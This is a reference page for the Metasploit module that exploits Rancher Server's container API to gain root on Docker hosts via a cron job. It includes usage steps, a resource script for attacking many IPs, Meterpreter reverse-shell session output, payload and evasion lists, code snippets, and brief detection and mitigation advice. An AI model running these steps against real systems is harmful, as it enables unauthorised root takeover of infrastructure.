Rancher Server - Docker Exploit - Metasploit


This page contains detailed information about how to use the exploit/linux/http/rancher_server metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Rancher Server - Docker Exploit
Module: exploit/linux/http/rancher_server
Source code: modules/exploits/linux/http/rancher_server.rb
Disclosure date: 2017-07-27
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): x64
Supported platform(s): Linux
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

Utilizing Rancher Server, an attacker can create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container. As the docker container executes command as uid 0 it is honored by the host operating system allowing the attacker to edit/create files owed by root. This exploit abuses this to creates a cron job in the '/etc/cron.d/' path of the host server. The Docker image should exist on the target system or be a valid image from hub.docker.com. Use check with verbose mode to get a list of exploitable Rancher Hosts managed by the target system.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using rancher_server against a single host

Normally, you can use exploit/linux/http/rancher_server this way:

msf > use exploit/linux/http/rancher_server
msf exploit(rancher_server) > show targets
    ... a list of targets ...
msf exploit(rancher_server) > set TARGET target-id
msf exploit(rancher_server) > show options
    ... show and set options ...
msf exploit(rancher_server) > exploit

Using rancher_server against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your rancher_server will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/rancher_server")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


Utilizing Rancher Server, an attacker can create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container. As the docker container executes command as uid 0 it is honored by the host operating system allowing the attacker to edit/create files owned by root. This exploit abuses this to creates a cron job in the '/etc/cron.d/' path of the host server.

The Docker image should exist on the target system or be a valid image from hub.docker.com.

Use check with verbose mode to get a list of exploitable Rancher Hosts managed by the target system.

Rancher setup


Rancher is deployed as a set of Docker containers. Running Rancher is as simple as launching two containers. One container as the management server and another container on a node as an agent.

This module was tested with Debian 9 and CentOS 7 as the host operating system with Docker 17.06.1-ce and Rancher Server 1.6.2, all with default installation.

Install Debian 9

First install Debian 9 with default task selection. This includes the "standard system utilities".

Install Docker CE

Then install a supported version of Docker on Debian system.

# TL;DR
apt-get remove docker docker-engine
apt-get install apt-transport-https ca-certificates curl gnupg2 software-properties-common
curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -
apt-key fingerprint 0EBFCD88
# Verify that the key ID is 9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88.
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable"
apt-get update
apt-get install docker-ce
docker run hello-world

Rancher Server (Management)

I recommend doing a 'Rancher Server - Single Container (NON-HA)' installation.

If Docker is installed, the command to start a single instance of Rancher is simple.

# TL;DR
sudo docker run -d --restart=unless-stopped -p 8080:8080 rancher/server

If all is passing navigate to http://[ip]:8080/. You should see the Rancher Server UI web application.

Rancher Host (Agent)

Add a new host to Rancher Server so that the Docker host can be managed.

Set Host Registration URL

The first time that you add a host, you may be required to set up the Host Registration URL.

  • Navigate to Admin / Settings (http://[ip]:8080/admin/settings)
  • Check if "http://[ip]:8080/" is set
  • Click on Save.

Add new host

  • Navigate to Infrastructure / Hosts (http://[ip]:8080/env/1a5/infra/hosts)
  • Click on Add Host
  • Copy the command from Point 5 (and remove sudo prefix) docker run --rm --privileged -v /var/run/docker.sock:/var/run/docker.sock -v /var/lib/rancher:/var/lib/rancher rancher/agent:v1.2.2 http://[ip]:8080/v1/scripts/XXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXX
  • Paste and run the command on the host

The new host should pop up on the Hosts screen within a minute.

Exploitation


This module is designed to gain root access on a Rancher Host.

Options


  • CONTAINER_ID if you want to have a human readable name for your container, otherwise it will be randomly generated.
  • DOCKERIMAGE is the local image or hub.docker.com available image you want to have Rancher to deploy for this exploit.
  • TARGETENV this is the target Rancher Environment. The default environment is 1a5.
  • TARGETHOST is the target Rancher Host. The default host is 1h1.

By default access control is disabled, but if enabled, you need API Keys with at least "restrictive" permission in the environment. See Rancher docs for api-keys and membership-roles.

  • HttpUsername is for your Access Key
  • HttpPassword is for your Secret Key

Advanced Options - TARGETURI this is the Rancher API base path. The default environment is /v1/projects. - WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start.

Steps to exploit with module


  • [ ] Start msfconsole
  • [ ] use exploit/linux/http/rancher_server
  • [ ] Set the options appropriately and set VERBOSE to true
  • [ ] Verify it creates a docker container and it successfully runs
  • [ ] After a minute a session should be opened from the agent server

Scenarios


msf > use exploit/linux/http/rancher_server
msf exploit(rancher_server) > set RHOST 192.168.91.111
RHOST => 192.168.91.111
msf exploit(rancher_server) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf exploit(rancher_server) > set LHOST 192.168.91.1
LHOST => 192.168.91.1
msf exploit(rancher_server) > set VERBOSE true
VERBOSE => true
msf exploit(rancher_server) > check

[+] Rancher Host "rancher" (TARGETHOST 1h1) on Environment "Default" (TARGETENV 1a5) found <-- targeted
[*] 192.168.91.111:8080 The target is vulnerable.
msf exploit(rancher_server) > exploit

[*] Started reverse TCP handler on 192.168.91.1:4444
[*] Setting container json request variables
[*] Creating the docker container command
[+] The docker container is created, waiting for it to deploy
[*] Waiting up to 60 seconds for docker container to start
[+] The docker container has stopped, now trying to remove it
[+] The docker container has been removed.
[*] Waiting for the cron job to run, can take up to 60 seconds
[*] Sending stage (40747 bytes) to 192.168.91.111
[*] Meterpreter session 1 opened (192.168.91.1:4444 -> 192.168.91.111:49948) at 2017-07-27 22:18:00 +0200
[+] Deleted /etc/cron.d/wlHVKGMA
[+] Deleted /tmp/jxKUxUyN

meterpreter > sysinfo
Computer     : rancher
OS           : Debian 9.1 (Linux 4.9.0-3-amd64)
Architecture : x64
Meterpreter  : x64/linux
meterpreter >

Exploit Detection


Rancher Server has an audit log. While running this module two events (create and delete) were logged. Even though the container is deleted, its still able to be viewed from the link in the audit log.

Mitigation


  • Do not deploy a Rancher Host on the same host where the Rancher Server is. Your entire rancher infrastructure is in danger.
  • Only allow trusted users to have more permissions than read-only.

Docker protection such as Username Namespaces could not be applied because Rancher Agents run as a privileged container.

Go back to menu.

Msfconsole Usage


Here is how the linux/http/rancher_server exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/rancher_server

[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/rancher_server) > show info

       Name: Rancher Server - Docker Exploit
     Module: exploit/linux/http/rancher_server
   Platform: Linux
       Arch: x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-07-27

Provided by:
  Martin Pizala

Available targets:
  Id  Name
  --  ----
  0   Linux

Check supported:
  Yes

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  CONTAINER_ID                   no        container id you would like
  DOCKERIMAGE   alpine:latest    yes       hub.docker.com image to use
  HttpPassword                   no        Rancher API Secret Key (Password)
  HttpUsername                   no        Rancher API Access Key (Username)
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         8080             yes       The target port (TCP)
  SSL           false            no        Negotiate SSL/TLS for outgoing connections
  TARGETENV     1a5              yes       Target Rancher Environment
  TARGETHOST    1h1              yes       Target Rancher Host
  VHOST                          no        HTTP server virtual host

Payload information:
  Space: 65000

Description:
  Utilizing Rancher Server, an attacker can create a docker container 
  with the '/' path mounted with read/write permissions on the host 
  server that is running the docker container. As the docker container 
  executes command as uid 0 it is honored by the host operating system 
  allowing the attacker to edit/create files owed by root. This 
  exploit abuses this to creates a cron job in the '/etc/cron.d/' path 
  of the host server. The Docker image should exist on the target 
  system or be a valid image from hub.docker.com. Use `check` with 
  verbose mode to get a list of exploitable Rancher Hosts managed by 
  the target system.

Module Options


This is a complete list of options available in the linux/http/rancher_server exploit:

msf6 exploit(linux/http/rancher_server) > show options

Module options (exploit/linux/http/rancher_server):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CONTAINER_ID                   no        container id you would like
   DOCKERIMAGE   alpine:latest    yes       hub.docker.com image to use
   HttpPassword                   no        Rancher API Secret Key (Password)
   HttpUsername                   no        Rancher API Access Key (Username)
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         8080             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETENV     1a5              yes       Target Rancher Environment
   TARGETHOST    1h1              yes       Target Rancher Host
   VHOST                          no        HTTP server virtual host

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux

Advanced Options


Here is a complete list of advanced options supported by the linux/http/rancher_server exploit:

msf6 exploit(linux/http/rancher_server) > show advanced

Module advanced options (exploit/linux/http/rancher_server):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   TARGETURI               /v1/projects                                        yes       Rancher API Path
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WAIT_TIMEOUT            60                                                  yes       Time in seconds to wait for the docker container to deploy
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                75                                                  no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/rancher_server module can exploit:

msf6 exploit(linux/http/rancher_server) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/rancher_server exploit:

msf6 exploit(linux/http/rancher_server) > show payloads

Compatible Payloads
===================

   #   Name                                          Disclosure Date  Rank    Check  Description
   -   ----                                          ---------------  ----    -----  -----------
   0   payload/generic/custom                                         normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                 normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                              normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/linux/x64/exec                                         normal  No     Linux Execute Command
   4   payload/linux/x64/meterpreter/bind_tcp                         normal  No     Linux Mettle x64, Bind TCP Stager
   5   payload/linux/x64/meterpreter/reverse_tcp                      normal  No     Linux Mettle x64, Reverse TCP Stager
   6   payload/linux/x64/shell/bind_tcp                               normal  No     Linux Command Shell, Bind TCP Stager
   7   payload/linux/x64/shell/reverse_tcp                            normal  No     Linux Command Shell, Reverse TCP Stager
   8   payload/linux/x64/shell_bind_ipv6_tcp                          normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   9   payload/linux/x64/shell_bind_tcp                               normal  No     Linux Command Shell, Bind TCP Inline
   10  payload/linux/x64/shell_bind_tcp_random_port                   normal  No     Linux Command Shell, Bind TCP Random Port Inline
   11  payload/linux/x64/shell_reverse_ipv6_tcp                       normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   12  payload/linux/x64/shell_reverse_tcp                            normal  No     Linux Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/rancher_server exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/rancher_server) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Manual cleanup of container "<CONTAINER_ID>" is needed on the target.


Here is a relevant code snippet related to the "Manual cleanup of container "<CONTAINER_ID>" is needed on the target." error message:

67:	      'headers' => { 'Accept' => 'application/json' }
68:	    )
69:	
70:	    return vprint_good('The docker container has been removed.') if res && res.code == 200
71:	
72:	    print_warning("Manual cleanup of container \"#{container_id}\" is needed on the target.")
73:	  end
74:	
75:	  def make_container_id
76:	    return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
77:	

Failed to connect to the target


Here is a relevant code snippet related to the "Failed to connect to the target" error message:

114:	      'ctype'   => 'application/json',
115:	      'headers' => { 'Accept' => 'application/json' }
116:	    )
117:	
118:	    if res.nil?
119:	      print_error('Failed to connect to the target')
120:	      return Exploit::CheckCode::Unknown
121:	    end
122:	
123:	    if res.code == 401 && res.headers.to_json.include?('X-Rancher-Version')
124:	      print_error('Authorization is required. Provide valid Rancher API Keys.')

Authorization is required. Provide valid Rancher API Keys.


Here is a relevant code snippet related to the "Authorization is required. Provide valid Rancher API Keys." error message:

119:	      print_error('Failed to connect to the target')
120:	      return Exploit::CheckCode::Unknown
121:	    end
122:	
123:	    if res.code == 401 && res.headers.to_json.include?('X-Rancher-Version')
124:	      print_error('Authorization is required. Provide valid Rancher API Keys.')
125:	      return Exploit::CheckCode::Detected
126:	    end
127:	
128:	    if res.code == 200 && res.headers.to_json.include?('X-Rancher-Version')
129:	      target_found = false

Your TARGETENV "<TARGETENV>" or/and TARGETHOST "<TARGETHOST>" is not available


Here is a relevant code snippet related to the "Your TARGETENV "<TARGETENV>" or/and TARGETHOST "<TARGETHOST>" is not available" error message:

155:	      end
156:	
157:	      if target_found
158:	        return Exploit::CheckCode::Vulnerable if target_selected
159:	
160:	        print_bad("Your TARGETENV \"#{datastore['TARGETENV']}\" or/and TARGETHOST \"#{datastore['TARGETHOST']}\" is not available")
161:	        if datastore['VERBOSE'] == false
162:	          print_bad('Try verbose mode to know what happened.')
163:	        end
164:	        vprint_bad('Choose a TARGETHOST and TARGETENV from the results above')
165:	        return Exploit::CheckCode::Appears

Try verbose mode to know what happened.


Here is a relevant code snippet related to the "Try verbose mode to know what happened." error message:

157:	      if target_found
158:	        return Exploit::CheckCode::Vulnerable if target_selected
159:	
160:	        print_bad("Your TARGETENV \"#{datastore['TARGETENV']}\" or/and TARGETHOST \"#{datastore['TARGETHOST']}\" is not available")
161:	        if datastore['VERBOSE'] == false
162:	          print_bad('Try verbose mode to know what happened.')
163:	        end
164:	        vprint_bad('Choose a TARGETHOST and TARGETENV from the results above')
165:	        return Exploit::CheckCode::Appears
166:	      else
167:	        print_bad('No TARGETHOST available')

Choose a TARGETHOST and TARGETENV from the results above


Here is a relevant code snippet related to the "Choose a TARGETHOST and TARGETENV from the results above" error message:

159:	
160:	        print_bad("Your TARGETENV \"#{datastore['TARGETENV']}\" or/and TARGETHOST \"#{datastore['TARGETHOST']}\" is not available")
161:	        if datastore['VERBOSE'] == false
162:	          print_bad('Try verbose mode to know what happened.')
163:	        end
164:	        vprint_bad('Choose a TARGETHOST and TARGETENV from the results above')
165:	        return Exploit::CheckCode::Appears
166:	      else
167:	        print_bad('No TARGETHOST available')
168:	        return Exploit::CheckCode::Detected
169:	      end

No TARGETHOST available


Here is a relevant code snippet related to the "No TARGETHOST available" error message:

162:	          print_bad('Try verbose mode to know what happened.')
163:	        end
164:	        vprint_bad('Choose a TARGETHOST and TARGETENV from the results above')
165:	        return Exploit::CheckCode::Appears
166:	      else
167:	        print_bad('No TARGETHOST available')
168:	        return Exploit::CheckCode::Detected
169:	      end
170:	    end
171:	
172:	    Exploit::CheckCode::Safe

Failed to connect to the target


Here is a relevant code snippet related to the "Failed to connect to the target" error message:

172:	    Exploit::CheckCode::Safe
173:	  end
174:	
175:	  def exploit
176:	    unless check == Exploit::CheckCode::Vulnerable
177:	      fail_with(Failure::Unknown, 'Failed to connect to the target')
178:	    end
179:	
180:	    # create required information to create json container information
181:	    cron_path = '/etc/cron.d/' + rand_text_alpha(8)
182:	    payload_path = '/tmp/' + rand_text_alpha(8)

Failed to create the docker container


Here is a relevant code snippet related to the "Failed to create the docker container" error message:

189:	      'uri'     => normalize_uri(target_uri.path, datastore['TARGETENV'], 'containers'),
190:	      'ctype'   => 'application/json',
191:	      'headers' => { 'Accept' => 'application/json' },
192:	      'data'    => make_container(mnt_path, cron_path, payload_path, container_id).to_json
193:	    )
194:	    fail_with(Failure::Unknown, 'Failed to create the docker container') unless res && res.code == 201
195:	
196:	    print_good('The docker container is created, waiting for it to deploy')
197:	
198:	    # cleanup
199:	    register_files_for_cleanup(cron_path, payload_path)

The docker container failed to start


Here is a relevant code snippet related to the "The docker container failed to start" error message:

224:	    end
225:	
226:	    # if container does not deploy, try to remove it and fail out
227:	    unless deleted_container
228:	      del_container(rancher_container_id, container_id)
229:	      fail_with(Failure::Unknown, "The docker container failed to start")
230:	    end
231:	
232:	    print_status('Waiting for the cron job to run, can take up to 60 seconds')
233:	  end
234:	end

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


Martin Pizala

Version


This page has been produced using Metasploit Framework version 6.2.9-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.